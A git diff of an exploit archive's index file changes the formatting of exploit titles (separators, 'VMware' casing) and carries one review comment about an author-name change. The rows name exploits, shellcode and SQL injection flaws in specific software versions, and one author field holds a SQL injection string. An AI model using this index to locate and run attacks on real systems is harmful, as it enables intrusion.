diff --git a/files.csv b/files.csv
index 8b36d3fd7..a9975da48 100755
--- a/files.csv
+++ b/files.csv
@@ -1890,7 +1890,7 @@ id,file,description,date,author,platform,type,port
 2192,platforms/php/webapps/2192.txt,"OPT Max 1.2.0 - (CRM_inc) Remote File Inclusion",2006-08-16,Kacper,php,webapps,0
 2193,platforms/linux/local/2193.php,"PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow Exploit",2006-08-16,Andi,linux,local,0
 2194,platforms/windows/dos/2194.pl,"Microsoft Windows PNG File IHDR Block Denial of Service Exploit PoC",2006-08-16,Preddy,windows,dos,0
-2195,platforms/windows/dos/2195.html,"VMware 5.5.1 COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0
+2195,platforms/windows/dos/2195.html,"VMware 5.5.1 - COM Object Arbitrary Partition Table Delete Exploit",2006-08-16,nop,windows,dos,0
 2196,platforms/php/webapps/2196.txt,"Mambo CopperminePhotoGalery Component Remote Include",2006-08-16,k1tk4t,php,webapps,0
 2198,platforms/php/webapps/2198.php,"CubeCart 3.0.11 - (oid) Remote Blind SQL Injection Exploit",2006-08-17,rgod,php,webapps,0
 2199,platforms/php/webapps/2199.txt,"IRSR 0.2 - (_sysSessionPath) Remote File Inclusion",2006-08-17,Kacper,php,webapps,0
@@ -3891,7 +3891,7 @@ id,file,description,date,author,platform,type,port
 4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0
 4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
 4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0
-4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0
+4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0
 4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0
 4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050
 4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0
@@ -5865,7 +5865,7 @@ id,file,description,date,author,platform,type,port
 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) Remote Arbitrary File Upload",2008-08-18,InjEctOr5,php,webapps,0
 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injection",2008-08-18,cOndemned,php,webapps,0
 6261,platforms/php/webapps/6261.txt,"php live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0
-6262,platforms/windows/dos/6262.txt,"VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS",2008-08-18,g_,windows,dos,0
+6262,platforms/windows/dos/6262.txt,"VMware Workstation - (hcmon.sys 6.0.0.45731) Local DoS",2008-08-18,g_,windows,dos,0
 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0
 6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory (id) SQL Injection",2008-08-19,"Hussin X",php,webapps,0
 6271,platforms/php/webapps/6271.txt,"Ad Board (id) SQL Injection",2008-08-19,"Hussin X",php,webapps,0
@@ -5930,7 +5930,7 @@ id,file,description,date,author,platform,type,port
 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0
 6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0
 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-09-01,Stack,php,webapps,0
-6345,platforms/windows/dos/6345.html,"VMware COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0
+6345,platforms/windows/dos/6345.html,"VMware - COM API ActiveX Remote Buffer Overflow PoC",2008-09-01,shinnai,windows,dos,0
 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - (uid) SQL Injection Exploit",2008-09-01,"Virangar Security",php,webapps,0
 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - (artid) SQL Injection",2008-09-02,MustLive,php,webapps,0
 6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - (id) SQL Injection",2008-09-02,"Hussin X",php,webapps,0
@@ -7089,7 +7089,7 @@ id,file,description,date,author,platform,type,port
 7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0
 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (.Skin) Local Buffer Overflow Exploit (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0
 7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0
-7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 beta Code Execution",2008-12-22,"Jacobo Gimeno",php,webapps,0
+7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0
 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0
 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Auth Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0
 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0
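Review bot: The 7549 row in this hunk changes the author field from "Jacobo Gimeno" to "Jacobo Avariento" in addition to the " - " separator that every other hunk in files.csv adds, so a data correction is mixed into what otherwise reads as pure title formatting. Presumably the attribution in platforms/php/webapps/7549.txt settles which name is right, but the commit message should call the author change out so it is not mistaken for a stray edit. If it was not intended, keep only the description change: `+7549,platforms/php/webapps/7549.txt,"RoundCube Webmail 0.2-3 beta - Code Execution",2008-12-22,"Jacobo Gimeno",php,webapps,0`.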
@@ -9438,9 +9438,9 @@ id,file,description,date,author,platform,type,port
 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - DoS",2009-10-02,PLATEN,windows,dos,21
 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030
 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - XSS",2009-09-23,"Francis Provencher",novell,webapps,8030
-10076,platforms/osx/local/10076.c,"VMWare Fusion 2.0.5 - vmx86 kext Kernel Local Root Exploit",2009-10-02,mu-b,osx,local,0
+10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Local Root Exploit",2009-10-02,mu-b,osx,local,0
 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389
-10078,platforms/osx/local/10078.c,"VMWare Fusion 2.0.5 vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0
+10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0
 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0
 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0
 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
@@ -11129,7 +11129,7 @@ id,file,description,date,author,platform,type,port
 12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent Local File",2010-04-12,eidelweiss,php,webapps,0
 12186,platforms/php/dos/12186.pl,"vBulletin - DoS",2010-04-12,"Jim Salim",php,dos,0
 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta - (RFI/LFI) Multiple File Include",2010-04-12,"cr4wl3r ",php,webapps,0
-12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string",2010-04-12,"Alexey Sintsov",multiple,dos,0
+12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0
 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
 12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - (id) SQL Injection",2010-04-13,v3n0m,php,webapps,0
@@ -13154,7 +13154,7 @@ id,file,description,date,author,platform,type,port
 15098,platforms/php/webapps/15098.txt,"FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0
 15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update and Command Execute",2010-09-26,Abysssec,php,webapps,0
 15102,platforms/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win_x86,webapps,80
-15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0
+15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 - VMkbd.sys Denial of Service Exploit",2010-09-25,"Lufeng Li",windows,dos,0
 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0
 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0
 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
@@ -13644,7 +13644,7 @@ id,file,description,date,author,platform,type,port
 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 < 1.3.1 - CSRF",2010-12-09,"Anatolia Security",multiple,webapps,0
 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - LFI Exploit",2010-12-09,Br0ly,php,webapps,0
 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
-15717,platforms/multiple/remote/15717.txt,"VMware Tools update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0
+15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0
 15714,platforms/php/webapps/15714.txt,"Joomla JE Auto Component 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - CSRF",2010-12-09,"High-Tech Bridge SA",php,webapps,0
 15720,platforms/php/webapps/15720.txt,"Sulata iSoft (stream.php) Local File Disclosure Exploit",2010-12-10,Sudden_death,php,webapps,0
@@ -15752,7 +15752,7 @@ id,file,description,date,author,platform,type,port
 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0
 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,Metasploit,windows,remote,0
 18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS (Metasploit)",2011-11-21,hellok,win_x86,local,0
-18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
+18138,platforms/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0
 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (.WAV) Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0
 18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0
@@ -16763,7 +16763,7 @@ id,file,description,date,author,platform,type,port
 19368,platforms/multiple/dos/19368.sh,"Lotus Domino 4.6.1/4.6.4 Notes SMTPA MTA Mail Relay",1999-06-15,"Robert Lister",multiple,dos,0
 19369,platforms/windows/remote/19369.rb,"Adobe Flash Player Object Type Confusion",2012-06-25,Metasploit,windows,remote,0
 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x / 5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0
-19371,platforms/linux/local/19371.c,"VMWare 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0
+19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0
 19372,platforms/windows/dos/19372.txt,"Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name",1999-06-28,"J D Glaser",windows,dos,0
 19373,platforms/linux/local/19373.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0
 19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0
@@ -18916,7 +18916,7 @@ id,file,description,date,author,platform,type,port
 21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion",2002-07-23,"Andreas Sandblad",windows,remote,0
 21637,platforms/hardware/dos/21637.c,"ZyXEL Prestige 642R Router - Malformed IP Packet Denial of Service",2002-07-24,"Jeff w. Roberson",hardware,dos,0
 21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access",2002-07-24,"Andreas Sandblad",multiple,remote,0
-21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 - Authentication Server Buffer Overflow",2002-07-24,"Zag & Glcs",windows,remote,0
+21639,platforms/windows/remote/21639.c,"VMware GSX Server 2.0 - Authentication Server Buffer Overflow",2002-07-24,"Zag & Glcs",windows,remote,0
 21640,platforms/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass",2002-07-24,pokley,php,webapps,0
 21641,platforms/cgi/remote/21641.txt,"GNU Mailman 2.0.x Subscribe Cross-Site Scripting",2002-07-24,office,cgi,remote,0
 21642,platforms/cgi/remote/21642.txt,"GNU Mailman 2.0.x Admin Login Variant Cross-Site Scripting",2002-07-24,office,cgi,remote,0
@@ -24169,7 +24169,7 @@ id,file,description,date,author,platform,type,port
 27043,platforms/hardware/dos/27043.py,"Samsung PS50C7700 TV - Denial of Service",2013-07-23,"Malik Mesellem",hardware,dos,5600
 27044,platforms/hardware/remote/27044.rb,"D-Link Devices UPnP SOAP Command Execution",2013-07-23,Metasploit,hardware,remote,0
 27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection",2013-07-23,Metasploit,linux,remote,443
-27046,platforms/windows/remote/27046.rb,"VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443
+27046,platforms/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload",2013-07-23,Metasploit,windows,remote,443
 27047,platforms/windows/dos/27047.txt,"Artweaver 3.1.5 - (.awd) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0
 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0
 27049,platforms/windows/dos/27049.txt,"XnView 2.03 - (.pct) Buffer Overflow",2013-07-23,"Core Security",windows,dos,0
@@ -25128,7 +25128,7 @@ id,file,description,date,author,platform,type,port
 28045,platforms/php/webapps/28045.txt,"dotWidget for articles 2.0 admin/categories.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0
 28063,platforms/php/webapps/28063.txt,"e107 0.7.5 - Search.php Cross-Site Scripting",2006-06-19,securityconnection,php,webapps,0
 28064,platforms/php/webapps/28064.txt,"Qto File Manager 1.0 index.php Cross-Site Scripting",2006-03-06,alijsb,php,webapps,0
-28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 Malformed VMX File Denial of Service",2006-06-19,n00b,multiple,dos,0
+28065,platforms/multiple/dos/28065.vmx,"VMware Player 1.0.1 Build 19317 - Malformed VMX File Denial of Service",2006-06-19,n00b,multiple,dos,0
 28066,platforms/php/webapps/28066.txt,"singapore 0.9.x/0.10 - Multiple Parameter Traversal Arbitrary File Access",2006-06-19,simo64,php,webapps,0
 28067,platforms/php/webapps/28067.txt,"singapore 0.9.x/0.10 index.php template Parameter XSS",2006-06-19,simo64,php,webapps,0
 28068,platforms/php/webapps/28068.txt,"V3 Chat Instant Messenger - mail/index.php id Parameter XSS",2006-06-20,Luny,php,webapps,0
@@ -25298,7 +25298,7 @@ id,file,description,date,author,platform,type,port
 28237,platforms/windows/dos/28237.py,"Target Longlife Media Player 2.0.2.0 - (.wav) Crash PoC",2013-09-12,gunslinger_,windows,dos,0
 28238,platforms/windows/webapps/28238.txt,"Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling (MS13-067)",2013-09-12,Vulnerability-Lab,windows,webapps,0
 28239,platforms/hardware/webapps/28239.txt,"D-Link DSL-2740B - Multiple CSRF Vulnerabilities",2013-09-12,"Ivano Binetti",hardware,webapps,0
-28395,platforms/windows/dos/28395.txt,"VMware 5.5.1 Partition Table Deletion Denial of Service",2006-08-15,nop,windows,dos,0
+28395,platforms/windows/dos/28395.txt,"VMware 5.5.1 - Partition Table Deletion Denial of Service",2006-08-15,nop,windows,dos,0
 28243,platforms/linux/webapps/28243.txt,"Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities",2013-09-12,"Andrea Fabrizi",linux,webapps,0
 28244,platforms/windows/dos/28244.txt,"Microsoft Internet Explorer 6.0 DataSourceControl Denial of Service",2006-07-19,hdm,windows,dos,0
 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss Command Execution",2006-07-19,"Jon Hart",hardware,remote,0
@@ -30057,7 +30057,7 @@ id,file,description,date,author,platform,type,port
 33307,platforms/php/webapps/33307.php,"RunCMS 'forum' Parameter SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps,0
 33308,platforms/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Parameter Local File Disclosure",2009-10-27,"Greg Miernicki",php,webapps,0
 33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting",2009-10-26,blake,php,webapps,0
-33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1_ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0
+33310,platforms/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",multiple,remote,0
 33311,platforms/linux/remote/33311.txt,"KDE 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0
 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0
 33313,platforms/linux/remote/33313.txt,"Mozilla Firefox 3.5.3 and SeaMonkey 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow",2009-10-27,regenrecht,linux,remote,0
@@ -30595,7 +30595,7 @@ id,file,description,date,author,platform,type,port
 33937,platforms/multiple/webapps/33937.txt,"TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting",2010-05-05,MustLive,multiple,webapps,0
 33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting",2010-02-04,"Karn Ganeshen",hardware,remote,0
 33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 - 'errinfo' Parameter Cross-Site Scripting",2010-02-06,"cp77fk4r ",java,webapps,0
-33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0
+33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x - URL Processing Cross-Site Scripting",2010-05-05,"Alexey Sintsov",multiple,remote,0
 33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 - 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite",2010-02-03,"Evdokimov Dmitriy",windows,remote,0
 33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80
 33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 < 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080
@@ -33390,7 +33390,7 @@ id,file,description,date,author,platform,type,port
 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0
 37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
 37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
-37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,Wadeek,php,webapps,0
+37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0
 37007,platforms/linux/remote/37007.txt,"AtMail 1.04 - Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0
 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0
 37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 - 'XSLTResult.java' Remote Arbitrary File Upload",2012-03-23,voidloafer,java,webapps,0
@@ -33636,13 +33636,13 @@ id,file,description,date,author,platform,type,port
 37306,platforms/linux/dos/37306.txt,"Mosh Remote Denial of Service",2012-05-22,"Timo Juhani Lindfors",linux,dos,0
 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0
 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0
-37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
+37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0
-37315,platforms/php/webapps/37315.txt,"phpCollab 2.5 uploadfile.php Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0
+37315,platforms/php/webapps/37315.txt,"phpCollab 2.5 - uploadfile.php Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0
 37257,platforms/php/webapps/37257.txt,"FiverrScript - CSRF (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
 37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure 
Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
 37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
@@ -33667,7 +33667,7 @@ id,file,description,date,author,platform,type,port
 37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
 37283,platforms/php/webapps/37283.txt,"AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload",2012-05-20,"Eyup CELIK",php,webapps,0
-37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0
+37316,platforms/php/webapps/37316.txt,"phpCollab 2.5 - Unauthenticated Direct Request Multiple Protected Page Access",2012-05-24,"team ' and 1=1--",php,webapps,0
 37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() shellcode (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service",2015-06-15,3unnym00n,windows,dos,0
 37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x/3.x/4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
@@ -36344,12 +36344,12 @@ id,file,description,date,author,platform,type,port
 40190,platforms/php/webapps/40190.txt,"WordPress WP Live Chat Support Plugin 6.2.03 - Stored XSS",2016-08-01,"Dennis Kerdijk & Erwin Kievith",php,webapps,80
 40191,platforms/php/webapps/40191.txt,"WordPress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) CSRF",2016-08-01,"Yorick Koster",php,webapps,80
 40192,platforms/windows/dos/40192.py,"Halliburton LogView Pro 9.7.5 - (.cgm/.tif/.tiff/.tifh) Crash PoC",2016-08-01,"Karn Ganeshen",windows,dos,0
-40194,platforms/multiple/dos/40194.txt,"Wireshark 1.12.0 to 1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
+40194,platforms/multiple/dos/40194.txt,"Wireshark 1.12.0 - 1.12.12 - NDS Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
 40195,platforms/multiple/dos/40195.txt,"Wireshark 2.0.0 to 2.0.4 - MMSE_ WAP_ WBXML_ and WSP Dissectors Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
-40196,platforms/win_x86-64/dos/40196.txt,"Wireshark 2.0.0 to 2.0.4 - CORBA IDL Dissectors Denial of Service",2016-08-03,Igor,win_x86-64,dos,0
-40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
-40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
-40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
+40196,platforms/win_x86-64/dos/40196.txt,"Wireshark 2.0.0 - 2.0.4 - CORBA IDL Dissectors Denial of Service",2016-08-03,Igor,win_x86-64,dos,0
+40197,platforms/multiple/dos/40197.txt,"Wireshark 2.0.0 - 2.0.4 / 1.12.0 - 1.12.12 - PacketBB Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
